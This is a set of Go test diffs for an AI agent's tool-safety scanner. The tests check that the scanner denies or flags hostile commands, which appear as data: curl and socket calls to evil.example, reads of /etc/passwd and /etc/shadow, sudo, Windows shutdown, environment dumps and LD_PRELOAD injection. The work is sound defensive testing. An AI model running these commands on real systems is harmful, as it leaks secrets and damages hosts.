+			ruleID:   "resource.timeout_exceeded",
+		},
+		{
+			name: "output exceeded",
+			req: Request{
+				ToolName:       "execute_code",
+				Backend:        BackendCodeExec,
+				MaxOutputBytes: DefaultPolicy().MaxOutputBytes + 1,
+				CodeBlocks: []CodeBlock{{
+					Language: "python",
+					Code:     "print(1)",
+				}},
+			},
+			decision: DecisionDeny,
+			ruleID:   "resource.output_limit_exceeded",
+		},
+		{
+			name: "background",
+			req: Request{
+				ToolName:   "execute_code",
+				Backend:    BackendCodeExec,
+				Background: true,
+				CodeBlocks: []CodeBlock{{
+					Language: "python",
+					Code:     "print(1)",
+				}},
+			},
+			decision: DecisionNeedsHumanReview,
+			ruleID:   "process.background",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			report := Scan(tt.req, DefaultPolicy())
+			if report.Decision != tt.decision || report.RuleID != tt.ruleID {
+				t.Fatalf("unexpected report: %+v", report)
+			}
+		})
+	}
+}
+
+func TestScanCodeExecShellAndNonShellBranches(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "execute_code",
+		Backend:  BackendCodeExec,
+		CodeBlocks: []CodeBlock{{
+			Language: "bash",
+			Code:     "go test ./...",
+		}},
+	}, DefaultPolicy())
+	if report.Decision != DecisionAllow {
+		t.Fatalf("bash code block should be allowed: %+v", report)
+	}
+
+	report = Scan(Request{
+		ToolName: "execute_code",
+		Backend:  BackendCodeExec,
+		CodeBlocks: []CodeBlock{{
+			Language: "python",
+			Code:     "import urllib.request; urllib.request.urlopen('https://evil.example')",
+		}},
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny ||
+		report.RuleID != "network.non_whitelisted_domain" {
+		t.Fatalf("python network code block should be denied: %+v", report)
+	}
+}
+
+func TestScanHighConcurrencyNeedsReview(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "printf jobs | xargs -P 64 -n 1 echo",
+	}, DefaultPolicy())
+	if report.Decision != DecisionNeedsHumanReview ||
+		report.RuleID != "resource.high_concurrency" {
+		t.Fatalf("unexpected report: %+v", report)
+	}
+}
+
+func TestScanFiveHundredCommands(t *testing.T) {
+	command := strings.Repeat("go test ./...\n", 500)
+	report := Scan(Request{
+		ToolName: "execute_code",
+		Backend:  BackendCodeExec,
+		CodeBlocks: []CodeBlock{{
+			Language: "python",
+			Code:     command,
+		}},
+	}, DefaultPolicy())
+	if report.Decision != DecisionAllow {
+		t.Fatalf("unexpected report: %+v", report)
+	}
+}
+
+func BenchmarkScanFiveHundredCommands(b *testing.B) {
+	command := strings.Repeat("go test ./...\n", 500)
+	req := Request{
+		ToolName: "execute_code",
+		Backend:  BackendCodeExec,
+		CodeBlocks: []CodeBlock{{
+			Language: "python",
+			Code:     command,
+		}},
+	}
+	policy := DefaultPolicy()
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		Scan(req, policy)
+	}
+}
+
+func TestAuditHelpersHandleNoopAndErrors(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "go test ./...",
+	}, DefaultPolicy())
+	if err := WriteAuditJSONL(nil, report); err != nil {
+		t.Fatalf("WriteAuditJSONL(nil) error = %v", err)
+	}
+	if err := AppendAuditFile("", report); err != nil {
+		t.Fatalf("AppendAuditFile(empty) error = %v", err)
+	}
+	missingParent := filepath.Join(t.TempDir(), "missing", "audit.jsonl")
+	if err := AppendAuditFile(missingParent, report); err == nil {
+		t.Fatal("AppendAuditFile missing parent error = nil")
+	}
+}
+
+func TestPermissionReasonWithoutEvidence(t *testing.T) {
+	reason := permissionReason(Report{
+		Decision:       DecisionDeny,
+		Recommendation: "provide a command",
+	})
+	if !strings.Contains(reason, "tool safety guard deny") ||
+		!strings.Contains(reason, "provide a command") {
+		t.Fatalf("unexpected reason: %q", reason)
+	}
+}
+
+func TestContainsPipelineIgnoresQuotedSeparators(t *testing.T) {
+	if containsPipeline(`echo "a|b"`) {
+		t.Fatal("double-quoted pipe should not count as pipeline")
+	}
+	if containsPipeline(`echo 'a;b'`) {
+		t.Fatal("single-quoted semicolon should not count as pipeline")
+	}
+	if !containsPipeline("go test ./... && go vet ./...") {
+		t.Fatal("&& should count as a command chain")
+	}
+}
+
+func TestWriteAuditJSONLWritesOneRecord(t *testing.T) {
+	var w countingWriter
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "go test ./...",
+	}, DefaultPolicy())
+	if err := WriteAuditJSONL(&w, report); err != nil {
+		t.Fatal(err)
+	}
+	if w.calls != 1 {
+		t.Fatalf("Write calls = %d, want 1", w.calls)
+	}
+	if !bytes.HasSuffix(w.data, []byte("\n")) {
+		t.Fatalf("audit record should end with newline: %q", w.data)
+	}
+	var event AuditEvent
+	if err := json.Unmarshal(bytes.TrimSpace(w.data), &event); err != nil {
+		t.Fatalf("audit record was not json: %v\n%s", err, string(w.data))
+	}
+	if event.Decision != DecisionAllow || event.ToolName != "workspace_exec" {
+		t.Fatalf("unexpected audit event: %+v", event)
+	}
+}
+
+type countingWriter struct {
+	calls int
+	data  []byte
+}
+
+type errorWriter struct{}
+
+func (errorWriter) Write([]byte) (int, error) {
+	return 0, errors.New("write failed")
+}
+
+func strconvQuote(s string) string {
+	b, _ := json.Marshal(s)
+	return string(b)
+}
+
+func (w *countingWriter) Write(p []byte) (int, error) {
+	w.calls++
+	w.data = append(w.data, p...)
+	return len(p), nil
+}

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -22,6 +22,8 @@ import (
 	"testing"
 
 	"trpc.group/trpc-go/trpc-agent-go/tool"
+	"trpc.group/trpc-go/trpc-agent-go/tool/hostexec"
+	"trpc.group/trpc-go/trpc-agent-go/tool/workspaceexec"
 )
 
 func TestScanRequiredSamples(t *testing.T) {
@@ -883,6 +885,130 @@ func TestPermissionPolicyResolvesHostExecDefaultTimeout(t *testing.T) {
 	}
 }
 
+func TestPermissionPolicyMatchesExecutorTimeoutSemantics(t *testing.T) {
+	hostSet, err := hostexec.NewToolSet()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if closer, ok := hostSet.(interface{ Close() error }); ok {
+		t.Cleanup(func() { _ = closer.Close() })
+	}
+	hostTool := hostSet.Tools(context.Background())[0]
+	workspaceTool := &workspaceexec.ExecTool{}
+	tests := []struct {
+		name     string
+		toolName string
+		execTool tool.Tool
+		args     string
+		want     int
+	}{
+		{
+			name: "workspace timeout_sec wins", toolName: "workspace_exec", execTool: workspaceTool,
+			args: `{"command":"go test ./...","timeout":300,"timeout_sec":1000}`,
+			want: 1000,
+		},
+		{
+			name: "workspace legacy timeoutSec wins", toolName: "workspace_exec", execTool: workspaceTool,
+			args: `{"command":"go test ./...","timeout":300,"timeoutSec":900}`,
+			want: 900,
+		},
+		{
+			name: "host ignores timeout", toolName: "exec_command", execTool: hostTool,
+			args: `{"command":"go test ./...","timeout":300,"timeout_sec":1000}`,
+			want: 1000,
+		},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
+				Tool: tt.execTool, ToolName: tt.toolName, Arguments: []byte(tt.args),
+			})
+			if err != nil || !ok {
+				t.Fatalf("parse request: ok=%v err=%v", ok, err)
+			}
+			if req.TimeoutSeconds != tt.want {
+				t.Fatalf("timeout = %d, want %d", req.TimeoutSeconds, tt.want)
+			}
+		})
+	}
+}
+
+func TestPermissionPolicyResolvesWorkspaceExecDefaultTimeout(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.MaxTimeoutSeconds = 30
+	guard := NewPermissionPolicy(policy)
+	for _, args := range []string{
+		`{"command":"go test ./..."}`,
+		`{"command":"go test ./...","timeout_sec":0}`,
+		`{"command":"go test ./...","timeout_sec":-1}`,
+	} {
+		decision, err := guard.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+			ToolName: "workspace_exec", Arguments: []byte(args),
+		})
+		if err != nil {
+			t.Fatal(err)
+		}
+		if decision.Action != tool.PermissionActionDeny ||
+			!strings.Contains(decision.Reason, "timeout 300s") {
+			t.Fatalf("workspace default timeout should be denied: %+v", decision)
+		}
+	}
+}
+
+func TestPermissionPolicyScansResolvedHostExecWorkdir(t *testing.T) {
+	set, err := hostexec.NewToolSet(hostexec.WithBaseDir("/etc"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if closer, ok := set.(interface{ Close() error }); ok {
+		t.Cleanup(func() { _ = closer.Close() })
+	}
+	execTool := set.Tools(context.Background())[0]
+	guard := NewPermissionPolicy(DefaultPolicy())
+	for _, args := range []string{
+		`{"command":"cat passwd","timeout_sec":300}`,
+		`{"command":"cat file","workdir":"ssl","timeout_sec":300}`,
+	} {
+		decision, err := guard.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+			Tool: execTool, ToolName: "exec_command", Arguments: []byte(args),
+		})
+		if err != nil {
+			t.Fatal(err)
+		}
+		if decision.Action != tool.PermissionActionDeny ||
+			!strings.Contains(decision.Reason, "sensitive.cwd_access") {
+			t.Fatalf("resolved host workdir should be denied: %+v", decision)
+		}
+	}
+}
+
+func TestPermissionPolicyReviewsInteractiveWrites(t *testing.T) {
+	guard := NewPermissionPolicy(DefaultPolicy())
+	tests := []struct {
+		name     string
+		toolName string
+		args     string
+		want     tool.PermissionAction
+	}{
+		{name: "host poll", toolName: "write_stdin", args: `{"session_id":"s"}`, want: tool.PermissionActionAllow},
+		{name: "host write", toolName: "write_stdin", args: `{"session_id":"s","chars":"open('/etc/passwd')"}`, want: tool.PermissionActionAsk},
+		{name: "workspace submit", toolName: "workspace_write_stdin", args: `{"session_id":"s","submit":true}`, want: tool.PermissionActionAsk},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			decision, err := guard.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+				ToolName: tt.toolName, Arguments: []byte(tt.args),
+			})
+			if err != nil {
+				t.Fatal(err)
+			}
+			if decision.Action != tt.want {
+				t.Fatalf("action = %q, want %q: %+v", decision.Action, tt.want, decision)
+			}
+		})
+	}
+}
+
 func TestPermissionPolicyChecksNonShellCodePathsAndNetwork(t *testing.T) {
 	tests := []struct {
 		name string
@@ -897,6 +1023,11 @@ func TestPermissionPolicyChecksNonShellCodePathsAndNetwork(t *testing.T) {
 		{
 			name: "non-allowlisted Python socket",
 			code: `socket.create_connection(('evil.example', 443))`,
+			rule: "network.non_whitelisted_domain",
+		},
+		{
+			name: "non-allowlisted chained Python socket",
+			code: `socket.socket().connect(('evil.example', 443))`,
 			rule: "network.non_whitelisted_domain",
 		},
 	}
@@ -1312,6 +1443,28 @@ func TestScanRedactsSecrets(t *testing.T) {
 	}
 }
 
+func TestScanRedactsSplitSecretArguments(t *testing.T) {
+	for _, command := range []string{
+		"client --api-key hunter2",
+		"client --token opaque-value",
+	} {
+		report := Scan(Request{
+			ToolName: "workspace_exec", Backend: BackendWorkspaceExec,
+			Command: command,
+		}, DefaultPolicy())
+		if report.Decision != DecisionDeny || !report.Redacted {
+			t.Fatalf("split secret should be denied and redacted: %+v", report)
+		}
+		raw, err := json.Marshal(report)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if bytes.Contains(raw, []byte("hunter2")) || bytes.Contains(raw, []byte("opaque-value")) {
+			t.Fatalf("serialized report leaked secret: %s", raw)
+		}
+	}
+}
+
 func TestScanMetadataEnvAndTelemetry(t *testing.T) {
 	report := Scan(Request{
 		ToolName: "workspace_exec",
@@ -1490,6 +1643,108 @@ func TestScanAdditionalRuleBranches(t *testing.T) {
 	}
 }
 
+func TestScanClosesNewCommandAndPathBypasses(t *testing.T) {
+	tests := []struct {
+		name   string
+		req    Request
+		ruleID string
+	}{
+		{
+			name: "windows cmd expansion",
+			req: Request{ToolName: "exec_command", Backend: BackendHostExec,
+				Command: `%COMSPEC% /c shutdown /s /t 0`, TimeoutSeconds: 300},
+			ruleID: "shell.windows_cmd_syntax",
+		},
+		{
+			name: "deferred trap builtin",
+			req: Request{ToolName: "workspace_exec", Backend: BackendWorkspaceExec,
+				Command: `trap 'sudo id' EXIT`, TimeoutSeconds: 300},
+			ruleID: "shell.intrinsic_unsafe_command",
+		},
+		{
+			name: "windows cwd",
+			req: Request{ToolName: "exec_command", Backend: BackendHostExec,
+				Command: "dir", Cwd: `C:\Windows`, TimeoutSeconds: 300},
+			ruleID: "sensitive.cwd_access",
+		},
+		{
+			name: "windows file read",
+			req: Request{ToolName: "exec_command", Backend: BackendHostExec,
+				Command: `type 'C:\Windows\System32\drivers\etc\hosts'`, TimeoutSeconds: 300},
+			ruleID: "sensitive.path_access",
+		},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			report := Scan(tt.req, DefaultPolicy())
+			if report.Decision == DecisionAllow || !reportHasRule(report, tt.ruleID) {
+				t.Fatalf("expected %s: %+v", tt.ruleID, report)
+			}
+		})
+	}
+}
+
+func TestScanEnvironmentDumpCommandsNeverAllow(t *testing.T) {
+	for _, command := range []string{"env", "printenv", "set"} {
+		report := Scan(Request{
+			ToolName: "exec_command", Backend: BackendHostExec,
+			Command: command, TimeoutSeconds: 300,
+		}, DefaultPolicy())
+		if report.Decision == DecisionAllow ||
+			!reportHasRule(report, "sensitive.inherited_environment") {
+			t.Fatalf("environment dump %q should not be allowed: %+v", command, report)
+		}
+	}
+}
+
+func TestScanEnvArgv0CannotHideEffectiveCommand(t *testing.T) {
+	tests := []struct {
+		command string
+		ruleID  string
+	}{
+		{command: "env -a marker sudo id", ruleID: "policy.denied_command"},
+		{command: "env --argv0 marker curl evil.example", ruleID: "network.non_whitelisted_domain"},
+		{command: "env -a marker curl evil.example", ruleID: "network.non_whitelisted_domain"},
+		{command: "env --unknown marker sudo id", ruleID: "shell.intrinsic_unsafe_command"},
+	}
+	for _, tt := range tests {
+		report := Scan(Request{
+			ToolName: "workspace_exec", Backend: BackendWorkspaceExec,
+			Command: tt.command, TimeoutSeconds: 300,
+		}, DefaultPolicy())
+		if report.Decision == DecisionAllow || !reportHasRule(report, tt.ruleID) {
+			t.Fatalf("env command bypassed %s: %+v", tt.ruleID, report)
+		}
+	}
+}
+
+func TestScanDetectsCommandAcrossLineContinuation(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "execute_code", Backend: BackendCodeExec,
+		CodeBlocks: []CodeBlock{{Language: "bash", Code: "cu\\\nrl evil.example"}},
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny ||
+		!reportHasRule(report, "network.non_whitelisted_domain") {
+		t.Fatalf("continued curl should be denied: %+v", report)
+	}
+}
+
+func TestScanReviewCommandsNormalizesExecutable(t *testing.T) {
+	for _, command := range []string{
+		"/usr/bin/npm install left-pad",
+		"env npm install left-pad",
+	} {
+		report := Scan(Request{
+			ToolName: "workspace_exec", Backend: BackendWorkspaceExec,
+			Command: command, TimeoutSeconds: 300,
+		}, DefaultPolicy())
+		if report.Decision != DecisionNeedsHumanReview ||
+			!reportHasRule(report, "dependency.environment_change") {
+			t.Fatalf("installer should require review: %+v", report)
+		}
+	}
+}
+
 func TestScanCodeExecAppliesRequestEnvelope(t *testing.T) {
 	tests := []struct {
 		name     string
@@ -1606,12 +1861,12 @@ func TestScanHighConcurrencyNeedsReview(t *testing.T) {
 
 func TestCommandNameStripsExecutableSuffixCaseInsensitively(t *testing.T) {
 	tests := map[string]string{
-		"DD.EXE":          "dd",
-		"Curl.ExE":        "curl",
-		"SCRIPT.CMD":      "script",
-		"Tool.BaT":        "tool",
-		"utility.CoM":     "utility",
-		`C:\\Bin\\DD.EXE`: "dd",
+		"DD.EXE":        "dd",
+		"Curl.ExE":      "curl",
+		"SCRIPT.CMD":    "script",
+		"Tool.BaT":      "tool",
+		"utility.CoM":   "utility",
+		`C:\Bin\DD.EXE`: "dd",
 	}
 	for input, want := range tests {
 		if got := commandName(input); got != want {
@@ -1901,12 +2156,12 @@ func TestNormalizeShellScriptVariants(t *testing.T) {
 		{
 			name:   "escaped LF",
 			script: "echo one\\\ntwo",
-			want:   "echo one two",
+			want:   "echo onetwo",
 		},
 		{
 			name:   "escaped CRLF",
 			script: "echo one\\\r\ntwo",
-			want:   "echo one two",
+			want:   "echo onetwo",
 		},
 		{
 			name:   "newline in single quotes",

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -21,10 +21,12 @@ import (
 	"strings"
 	"sync"
 	"testing"
+	"time"
 
 	"trpc.group/trpc-go/trpc-agent-go/codeexecutor"
 	itool "trpc.group/trpc-go/trpc-agent-go/internal/tool"
 	"trpc.group/trpc-go/trpc-agent-go/tool"
+	codeexectool "trpc.group/trpc-go/trpc-agent-go/tool/codeexec"
 	"trpc.group/trpc-go/trpc-agent-go/tool/hostexec"
 	"trpc.group/trpc-go/trpc-agent-go/tool/workspaceexec"
 )
@@ -1105,6 +1107,105 @@ func TestPermissionPolicyChecksNonShellCodePathsAndNetwork(t *testing.T) {
 	}
 }
 
+func TestPermissionPolicyRecognizesRenamedCodeExec(t *testing.T) {
+	execTool := codeexectool.NewTool(
+		&permissionCodeExecutor{timeout: 10 * time.Second, bounded: true},
+		codeexectool.WithName("python_runner"),
+	)
+	guard := NewPermissionPolicy(DefaultPolicy())
+	for _, tt := range []struct {
+		name string
+		code string
+		rule string
+	}{
+		{
+			name: "denied path",
+			code: `print(open('/etc/passwd').read())`,
+			rule: "sensitive.path_access",
+		},
+		{
+			name: "non-allowlisted network",
+			code: `socket.create_connection(('evil.example', 443))`,
+			rule: "network.non_whitelisted_domain",
+		},
+	} {
+		t.Run(tt.name, func(t *testing.T) {
+			args, err := json.Marshal(map[string]any{
+				"code_blocks": []map[string]string{{
+					"language": "python",
+					"code":     tt.code,
+				}},
+			})
+			if err != nil {
+				t.Fatal(err)
+			}
+			decision, err := guard.CheckToolPermission(
+				context.Background(),
+				&tool.PermissionRequest{
+					Tool:        execTool,
+					ToolName:    "python_runner",
+					Declaration: execTool.Declaration(),
+					Arguments:   args,
+				},
+			)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if decision.Action != tool.PermissionActionDeny ||
+				!strings.Contains(decision.Reason, tt.rule) {
+				t.Fatalf("renamed codeexec bypassed %s: %+v", tt.rule, decision)
+			}
+		})
+	}
+}
+
+func TestPermissionPolicyUsesCodeExecutorTimeout(t *testing.T) {
+	args := []byte(`{"code_blocks":[{"language":"python","code":"print(1)"}]}`)
+	for _, tt := range []struct {
+		name    string
+		timeout time.Duration
+		bounded bool
+		rule    string
+	}{
+		{
+			name:    "timeout exceeds policy",
+			timeout: 45 * time.Second,
+			bounded: true,
+			rule:    "resource.timeout_exceeded",
+		},
+		{
+			name:    "unbounded timeout",
+			bounded: false,
+			rule:    "resource.unbounded_timeout",
+		},
+	} {
+		t.Run(tt.name, func(t *testing.T) {
+			execTool := codeexectool.NewTool(&permissionCodeExecutor{
+				timeout: tt.timeout,
+				bounded: tt.bounded,
+			})
+			policy := DefaultPolicy()
+			policy.MaxTimeoutSeconds = 30
+			decision, err := NewPermissionPolicy(policy).CheckToolPermission(
+				context.Background(),
+				&tool.PermissionRequest{
+					Tool:        execTool,
+					ToolName:    "execute_code",
+					Declaration: execTool.Declaration(),
+					Arguments:   args,
+				},
+			)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if decision.Action != tool.PermissionActionDeny ||
+				!strings.Contains(decision.Reason, tt.rule) {
+				t.Fatalf("code executor timeout bypassed %s: %+v", tt.rule, decision)
+			}
+		})
+	}
+}
+
 func TestPermissionPolicyValidatesDeclaredCustomOutputCap(t *testing.T) {
 	policyConfig := DefaultPolicy()
 	policyConfig.MaxOutputBytes = 1024
@@ -1814,6 +1915,18 @@ func TestScanClosesNewCommandAndPathBypasses(t *testing.T) {
 			req: Request{ToolName: "exec_command", Backend: BackendHostExec,
 				Command: `%COMSPEC% /c shutdown /s /t 0`, TimeoutSeconds: 300},
 			ruleID: "shell.windows_cmd_syntax",
+		},
+		{
+			name: "windows start builtin",
+			req: Request{ToolName: "exec_command", Backend: BackendHostExec,
+				Command: `start "" shutdown /s /t 0`, TimeoutSeconds: 300},
+			ruleID: "shell.windows_cmd_builtin",
+		},
+		{
+			name: "windows call builtin",
+			req: Request{ToolName: "exec_command", Backend: BackendHostExec,
+				Command: `call shutdown /s /t 0`, TimeoutSeconds: 300},
+			ruleID: "shell.windows_cmd_builtin",
 		},
 		{
 			name: "deferred trap builtin",
@@ -2908,6 +3021,26 @@ type failingCloser struct {
 	writeErr error
 	closeErr error
 	closed   bool
+}
+
+type permissionCodeExecutor struct {
+	timeout time.Duration
+	bounded bool
+}
+
+func (e *permissionCodeExecutor) ExecuteCode(
+	_ context.Context,
+	_ codeexecutor.CodeExecutionInput,
+) (codeexecutor.CodeExecutionResult, error) {
+	return codeexecutor.CodeExecutionResult{}, nil
+}
+
+func (e *permissionCodeExecutor) CodeBlockDelimiter() codeexecutor.CodeBlockDelimiter {
+	return codeexecutor.CodeBlockDelimiter{}
+}
+
+func (e *permissionCodeExecutor) CodeExecutionTimeout() (time.Duration, bool) {
+	return e.timeout, e.bounded
 }
 
 func (f *failingCloser) Write(p []byte) (int, error) {

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -13,6 +13,7 @@ import (
 	"context"
 	"encoding/json"
 	"errors"
+	"io"
 	"os"
 	"path/filepath"
 	"runtime"
@@ -21,6 +22,7 @@ import (
 	"sync"
 	"testing"
 
+	itool "trpc.group/trpc-go/trpc-agent-go/internal/tool"
 	"trpc.group/trpc-go/trpc-agent-go/tool"
 	"trpc.group/trpc-go/trpc-agent-go/tool/hostexec"
 	"trpc.group/trpc-go/trpc-agent-go/tool/workspaceexec"
@@ -1472,7 +1474,11 @@ func TestScanMetadataEnvAndTelemetry(t *testing.T) {
 		Command:  "go test ./...",
 		Metadata: ToolMetadata{Destructive: true},
 		Env: map[string]string{
-			"PATH":    "/bin",
+			// LANG is allowlisted and does not resolve executables, so this
+			// case isolates the metadata and allowlist rules. Execution
+			// resolving variables are covered by
+			// TestScanExecutionResolvingEnvOverrides.
+			"LANG":    "C",
 			"BAD_ENV": "1",
 		},
 	}, DefaultPolicy())
@@ -2299,4 +2305,405 @@ func (w *countingWriter) Write(p []byte) (int, error) {
 	w.calls++
 	w.data = append(w.data, p...)
 	return len(p), nil
+}
+
+// TestPermissionPolicyScansToolSetPrefixedBuiltins proves that a built-in
+// executor reached through a ToolSet keeps its scan. llmagent exposes ToolSet
+// members through NewNamedToolSet, so the model-visible name carries the set
+// prefix and the wrapper hides tool.ExecPermissionContextResolver.
+func TestPermissionPolicyScansToolSetPrefixedBuiltins(t *testing.T) {
+	for _, tc := range []struct {
+		name       string
+		setOptions []hostexec.Option
+		execName   string
+		stdinName  string
+	}{
+		{
+			name:      "default tool set name",
+			execName:  "hostexec_exec_command",
+			stdinName: "hostexec_write_stdin",
+		},
+		{
+			name:       "custom tool set name",
+			setOptions: []hostexec.Option{hostexec.WithName("shell")},
+			execName:   "shell_exec_command",
+			stdinName:  "shell_write_stdin",
+		},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			opts := append(
+				[]hostexec.Option{hostexec.WithBaseDir(t.TempDir())},
+				tc.setOptions...,
+			)
+			set, err := hostexec.NewToolSet(opts...)
+			if err != nil {
+				t.Fatal(err)
+			}
+			t.Cleanup(func() { _ = set.Close() })
+
+			ctx := context.Background()
+			named := make(map[string]tool.Tool)
+			for _, tl := range itool.NewNamedToolSet(set).Tools(ctx) {
+				named[tl.Declaration().Name] = tl
+			}
+			for _, want := range []string{tc.execName, tc.stdinName} {
+				if named[want] == nil {
+					t.Fatalf("tool %q not exposed, got %v", want, named)
+				}
+			}
+
+			policy := NewPermissionPolicy(DefaultPolicy())
+			for _, call := range []struct {
+				toolName string
+				args     string
+				want     tool.PermissionAction
+			}{
+				{tc.execName, `{"command":"sudo id"}`, tool.PermissionActionDeny},
+				{tc.stdinName, `{"chars":"cat /etc/shadow\n","submit":true}`, tool.PermissionActionAsk},
+			} {
+				tl := named[call.toolName]
+				decision, err := policy.CheckToolPermission(ctx, &tool.PermissionRequest{
+					Tool:        tl,
+					ToolName:    call.toolName,
+					Declaration: tl.Declaration(),
+					Arguments:   []byte(call.args),
+				})
+				if err != nil {
+					t.Fatal(err)
+				}
+				if decision.Action != call.want {
+					t.Fatalf("%s action = %q, want %q", call.toolName, decision.Action, call.want)
+				}
+			}
+		})
+	}
+}
+
+// TestPermissionPolicyScansWorkspaceExecInitialStdin proves that a payload
+// carried only in stdin is scanned. workspace_exec forwards the field verbatim
+// to the interpreter, so it never appears in the command.
+func TestPermissionPolicyScansWorkspaceExecInitialStdin(t *testing.T) {
+	policy := NewPermissionPolicy(DefaultPolicy())
+	for _, tc := range []struct {
+		name string
+		args string
+		want tool.PermissionAction
+	}{
+		{
+			name: "denied path in stdin",
+			args: `{"command":"python","stdin":"print(open('/etc/passwd').read())"}`,
+			want: tool.PermissionActionDeny,
+		},
+		{
+			name: "non allowlisted host in stdin",
+			args: `{"command":"python","stdin":"import socket\nsocket.create_connection(('evil.example', 443))"}`,
+			want: tool.PermissionActionDeny,
+		},
+		{
+			name: "benign stdin still needs review",
+			args: `{"command":"python","stdin":"print(1)"}`,
+			want: tool.PermissionActionAsk,
+		},
+		{
+			name: "absent stdin keeps the command decision",
+			args: `{"command":"go test ./..."}`,
+			want: tool.PermissionActionAllow,
+		},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			decision, err := policy.CheckToolPermission(
+				context.Background(),
+				&tool.PermissionRequest{
+					ToolName:  "workspace_exec",
+					Arguments: []byte(tc.args),
+				},
+			)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if decision.Action != tc.want {
+				t.Fatalf("action = %q, want %q (%s)", decision.Action, tc.want, decision.Reason)
+			}
+		})
+	}
+}
+
+// TestPermissionPolicyIgnoresStdinForHostExec keeps the adapter aligned with
+// each executor: exec_command has no stdin argument and drops the field, so
+// scanning it would block a request the executor never acts on.
+func TestPermissionPolicyIgnoresStdinForHostExec(t *testing.T) {
+	req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
+		ToolName:  "exec_command",
+		Arguments: []byte(`{"command":"echo hi","stdin":"print(open('/etc/passwd').read())"}`),
+	})
+	if err != nil || !ok {
+		t.Fatalf("ok = %v, err = %v", ok, err)
+	}
+	if req.Stdin != "" {
+		t.Fatalf("hostexec request captured stdin = %q, want empty", req.Stdin)
+	}
+}
+
+// TestScanExecutionResolvingEnvOverrides proves that a safe command paired with
+// hostile execution-resolving variables never returns allow. Both execution
+// paths hand request environment values to a shell, and workspace_exec only
+// enables clean-environment hardening when its separate command policy is set,
+// so allowlisting these variables by name is not sufficient.
+func TestScanExecutionResolvingEnvOverrides(t *testing.T) {
+	for _, tc := range []struct {
+		name string
+		env  map[string]string
+		want Decision
+	}{
+		{
+			name: "hostile HOME and PATH",
+			env:  map[string]string{"HOME": ".", "PATH": "."},
+			want: DecisionDeny,
+		},
+		{
+			name: "relative PATH entry among absolute ones",
+			env:  map[string]string{"PATH": "/usr/bin:./bin"},
+			want: DecisionDeny,
+		},
+		{
+			name: "empty HOME falls back to shell defaults",
+			env:  map[string]string{"HOME": ""},
+			want: DecisionDeny,
+		},
+		{
+			name: "loader injection",
+			env:  map[string]string{"LD_PRELOAD": "/tmp/evil.so"},
+			want: DecisionNeedsHumanReview,
+		},
+		{
+			name: "absolute PATH still needs review",
+			env:  map[string]string{"PATH": "/usr/bin:/bin"},
+			want: DecisionNeedsHumanReview,
+		},
+		{
+			name: "windows absolute PATH still needs review",
+			env:  map[string]string{"PATH": `C:\Windows\System32;C:\tools`},
+			want: DecisionNeedsHumanReview,
+		},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  "echo hi",
+				Env:      tc.env,
+			}, DefaultPolicy())
+			if report.Decision != tc.want {
+				t.Fatalf("decision = %q, want %q: %+v", report.Decision, tc.want, report)
+			}
+			if report.RuleID != "environment.execution_resolution_override" {
+				t.Fatalf("rule = %q, want environment.execution_resolution_override", report.RuleID)
+			}
+		})
+	}
+
+	// A variable that does not resolve executables keeps the command decision.
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "echo hi",
+		Env:      map[string]string{"LANG": "C"},
+	}, DefaultPolicy())
+	if report.Decision != DecisionAllow {
+		t.Fatalf("LANG override decision = %q, want allow: %+v", report.Decision, report)
+	}
+}
+
+// TestScanRedactsAuthorizationCredentials proves that a bearer or basic
+// credential never survives into any exposed report field.
+func TestScanRedactsAuthorizationCredentials(t *testing.T) {
+	for _, tc := range []struct {
+		name    string
+		command string
+		secret  string
+	}{
+		{
+			name:    "bearer header",
+			command: `curl -H 'Authorization: Bearer abc123opaque' https://api.github.com`,
+			secret:  "abc123opaque",
+		},
+		{
+			name:    "basic header",
+			command: `curl -H "Authorization: Basic dXNlcjpwYXNz" https://api.github.com`,
+			secret:  "dXNlcjpwYXNz",
+		},
+		{
+			name:    "proxy authorization header",
+			command: `curl -H 'Proxy-Authorization: Bearer proxysecret' https://api.github.com`,
+			secret:  "proxysecret",
+		},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  tc.command,
+			}, DefaultPolicy())
+			if report.Decision == DecisionAllow || !report.Redacted {
+				t.Fatalf("credential command should not be allowed unredacted: %+v", report)
+			}
+			if strings.Contains(report.Command, tc.secret) ||
